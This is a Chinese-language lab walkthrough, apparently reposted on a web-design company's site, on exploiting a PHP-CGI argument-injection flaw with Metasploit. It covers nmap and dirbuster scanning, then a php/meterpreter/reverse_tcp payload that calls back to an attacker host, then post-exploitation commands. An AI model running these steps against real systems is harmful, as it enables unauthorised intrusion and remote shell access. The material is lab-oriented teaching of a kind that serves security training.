利用phpMyAdmin漏洞上傳***程序，獲得webshell。

為山亭等地區(qū)用戶提供了全套網(wǎng)頁設(shè)計(jì)制作服務(wù)，及山亭網(wǎng)站建設(shè)行業(yè)解決方案。主營(yíng)業(yè)務(wù)為做網(wǎng)站、成都做網(wǎng)站、山亭網(wǎng)站設(shè)計(jì)，以傳統(tǒng)方式定制建設(shè)網(wǎng)站，并提供域名空間備案等一條龍服務(wù)，秉承以專業(yè)、用心的態(tài)度為用戶提供真誠(chéng)的服務(wù)。我們深信只要達(dá)到每一位用戶的要求，就會(huì)得到認(rèn)可，從而選擇與我們長(zhǎng)期合作。這樣，我們也可以走得更遠(yuǎn)！

    CGI腳本沒有正確處理請(qǐng)求參數(shù)，導(dǎo)致源代碼泄露，允許遠(yuǎn)程***者在請(qǐng)求參數(shù)中插入執(zhí)行命令。

一、利用nmap工具掃描目標(biāo)主機(jī)

1.1使用nmap命令對(duì)目標(biāo)主機(jī)進(jìn)行掃描。單擊桌面空白處，右鍵菜單選擇“在終端中打開”。

1.2在終端中輸入命令“nmap –sV  192.168.1.3”，對(duì)目標(biāo)主機(jī)進(jìn)行端口掃描，發(fā)現(xiàn)開放80端口。

1.3在瀏覽器地址欄中輸入“http:\\192.168.1.3”，訪問目標(biāo)網(wǎng)站。

二、利用dirbuster掃描目標(biāo)主機(jī)

2.1在終端中輸入命令“dirbuster”，啟動(dòng)軟件對(duì)目標(biāo)網(wǎng)站進(jìn)行掃描。

2.2在Target URL處輸入“192.168.1.3”，在File with list of dirs./file處選擇字典文件（/usr/share/dirbuster/wordlists/目錄下），單擊“Start”按鈕，開始掃描。

2.3掃描結(jié)果顯示包含cgi-bin目錄、phpmyadmin目錄等。

三、利用metasploit***目標(biāo)主機(jī)

3.1在終端中輸入命令“msfconsole”，啟動(dòng)MSF終端。

3.2在終端中輸入命令“search php_cgi”，搜索php_cgi的相關(guān)工具和***載荷。

3.3在終端中輸入命令“use exploit/multi/http/php_cgi_arg_injection”，啟用漏洞利用模塊, 提示符就會(huì)提示進(jìn)入到該路徑下。

3.4在終端中輸入命令“show payloads”，顯示Metasploit中可以在遠(yuǎn)程主機(jī)執(zhí)行的代碼，即shellcode。

3.5在終端中輸入命令“set PAYLOAD php/meterpreter/reverse_tcp”，設(shè)置使用的shellcode代碼。

3.6在終端中輸入“show options”，顯示***模塊需要設(shè)置的參數(shù)。

3.7在終端中輸入“set LHOST 192.168.1.2”,設(shè)置源主機(jī)的IP地址，用于會(huì)話的反向鏈接。

3.8在終端中輸入“set RHOST 192.168.1.3”,設(shè)置目標(biāo)主機(jī)的IP。

3.9在終端中輸入“exploit”,開始對(duì)目標(biāo)主機(jī)進(jìn)行***。

3.10在終端中輸入“sysinfo”,查看系統(tǒng)環(huán)境信息。

3.11在終端中輸入“l(fā)s”,顯示當(dāng)前目錄下的文件內(nèi)容。

3.12在終端中輸入“cat phpinfo.php”,查看文件內(nèi)容。

文章名稱：Metasploit溢出phpMyAdmin漏洞
文章地址：http://aaarwkj.com/article44/igsohe.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供全網(wǎng)營(yíng)銷推廣、建站公司、微信公眾號(hào)、定制開發(fā)、網(wǎng)站導(dǎo)航、網(wǎng)站制作

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)